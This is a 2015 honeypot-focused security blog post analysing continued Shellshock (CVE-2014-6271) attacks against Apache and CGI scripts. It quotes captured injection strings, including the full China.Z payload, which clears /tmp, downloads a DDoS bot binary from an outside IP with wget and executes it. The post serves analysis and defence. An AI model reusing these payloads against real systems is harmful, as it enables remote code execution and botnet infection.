Mittwoch, 4. November 2015

Shellshock revisited - Still a weapon of choice

I really thought that shellshock is a shadow of the past, but I still see many different attempts trying to inject shellcode into Apache on my Honeypots. These attempts are performed directly on Apache or they try to inject it via cgi scripts.
I see it often enough to revisit these vulnerability again.

Shellshock

 The whole trouble started with CVE-2014-6271 which was reported on September 24, 2014. The vulnerability resides directly in bash, where an attacker could inject code into a normal shell function and the injected code would not be checked against the user privileges. So it would be possible for an attacker to execute the code with at least the privileges of the service daemon or even root privileges. As you can see here https://exchange.xforce.ibmcloud.com/vulnerabilities/96153
the vulnerability belongs to BASH 3.0, 3.1, 3.2 and 4.0 which have been widely used within almost all Linux and Unix distribution that time.

The easy to use design of the vulnerability was the foundation of it being widely used.

The general design of an attack is

() { :;}; echo test

As seen on my Honeypot


That is all that is needed, today I see code like this on my honeypots
() { :;};/usr/bin/perl -e '...'
() { :;}; /bin/bash -c "ping xx.xx.xx.xx -c 1"
 In general, the bash code is used to
  1. Download (via wget, curl or fetch) malicious files (like Perl backdoor, botnet or java code) and execute the code
  2. Send a recognition to an external server
Some of the malware was accessible for further investigation. So I can say that it is really mostly botnet and backdoor software written in perl. I have the feeling that this attack is of "low cost" for the attacker and so they still run it against all network ranges to maybe get lucky.

China.Z

 The most popular malware using the Shellshock vulnerability was China.Z.
 () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
As you can read on my Honeypot focused blog.
The malware is normally detected as Linux.Trojan.Agent by ClamAV.
The Java file herby is an
java: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
China.Z is a DDoS bot software which already comes along with a hard coded list of target IPs. The used compiler was GCC 4.0.0 as it can be found on RedHat.


Secure yourself

 Securing against this vulnerability is not hard. The issue was fixed within days after the first occurrence. The vulnerability mainly resides in
 
Affected Products
GNU Bash 3.0
GNU Bash 3.1
GNU Bash 3.2
GNU Bash 4.0
GNU Bash 4.1
GNU Bash 4.2
GNU Bash 4.3
 (source: https://exchange.xforce.ibmcloud.com/vulnerabilities/96153)

Please keep in mind, that although the vulnerability is associated with other software too (like mod_cgi, dhcp-server) they all are leading back to the vulnerability in Bash itself.



Eingestellt von um Keine Kommentare:
Abonnieren Posts (Atom)